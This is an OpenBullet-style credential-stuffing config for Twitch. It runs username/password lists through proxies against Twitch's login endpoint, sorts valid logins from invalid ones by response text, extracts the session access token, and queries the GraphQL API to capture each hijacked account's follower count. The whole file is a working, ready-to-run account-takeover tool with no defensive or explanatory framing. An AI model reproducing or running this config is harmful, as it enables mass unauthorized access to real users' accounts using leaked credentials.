[SETTINGS]
{
  "Name": "Twitch",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2021-01-07T16:07:47.4617321+03:30",
  "AdditionalInfo": "Ricking#3224",
  "Author": "Ricking#3224",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": true,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://passport.twitch.tv/login?trusted_request=true" 
  CONTENT "{\"client_id\":\"kd1unb4b3q4t58fwlpcbzcbnm76a8fp\",\"force_twitchguard\":false,\"password\":\"<PASS>\",\"undelete_user\":false,\"username\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or password" 
    KEY "Invalid username." 
    KEY "We have disabled the ability to log in with your email address. Please log in with your username instead" 
  KEYCHAIN Success OR 
    KEY "{\"captcha_proof" 

#TOKEN PARSE "<SOURCE>" JSON "access_token" -> VAR "TOKEN" 

#Username PARSE "<USER>" LR "" "" CreateEmpty=FALSE -> CAP "Username" 

#P REQUEST POST "https://gql.twitch.tv/gql" 
  CONTENT "[{\"operationName\":\"PersonalSections\",\"variables\":{\"input\":{\"sectionInputs\":[\"FOLLOWED_SECTION\",\"RECOMMENDED_SECTION\",\"SIMILAR_SECTION\"],\"recommendationContext\":{\"platform\":\"web\"},\"contextChannelName\":\"<USER>\"},\"channelLogin\":\"<USER>\",\"withChannelUser\":true},\"extensions\":{\"persistedQuery\":{\"version\":1,\"sha256Hash\":\"469efc9442aa2b7634a3ab36eae1778b78ec7ccf062d2b17833afb0e66b78a25\"}}}]" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US" 
  HEADER "Authorization: OAuth <TOKEN>" 
  HEADER "Client-Id: kimne78kx3ncx6brgo4mv6wki5h1ko" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 208" 
  HEADER "Host: gql.twitch.tv" 
  HEADER "Origin: https://www.twitch.tv" 
  HEADER "Referer: https://www.twitch.tv/symfuhny" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "X-Device-Id: ed2eccb9068a959f" 

#chanid PARSE "<SOURCE>" JSON "id" -> VAR "chanid" 

#Followers REQUEST POST "https://gql.twitch.tv/gql" 
  CONTENT "{\"variables\":{\"channelID\":\"<chanid>\"},\"query\":\"query ProfileInfoFromChannelID($channelID: ID!) { user(id: $channelID) { __typename ...ProfileInfoFragment } }fragment ProfileInfoFragment on User { __typename id login displayName description profileImageURL(width: 600) bannerImageURL profileViewCount followers { __typename totalCount } lastBroadcast { __typename startedAt } stream { __typename game { __typename displayName } viewersCount } roles { __typename isPartner } currentUser: self { __typename subscriptionBenefit { __typename id } } panels { __typename ... on DefaultPanel { title linkURL imageURL description } } primaryColorHex ...SubscriptionProductEligibilityFragment channel { __typename socialMedias { __typename ...SocialMediaFragment } } }fragment SubscriptionProductEligibilityFragment on User { __typename subscriptionProducts { __typename offers { __typename eligibility { __typename isEligible } } } }fragment SocialMediaFragment on SocialMedia { __typename id name title url }\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US" 
  HEADER "Authorization: OAuth <TOKEN>" 
  HEADER "Client-Id: kimne78kx3ncx6brgo4mv6wki5h1ko" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 208" 
  HEADER "Host: gql.twitch.tv" 
  HEADER "Origin: https://www.twitch.tv" 
  HEADER "Referer: https://www.twitch.tv/symfuhny" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "X-Device-Id: ed2eccb9068a959f" 

#Followers PARSE "<SOURCE>" JSON "totalCount" CreateEmpty=FALSE -> CAP "Followers" 
  
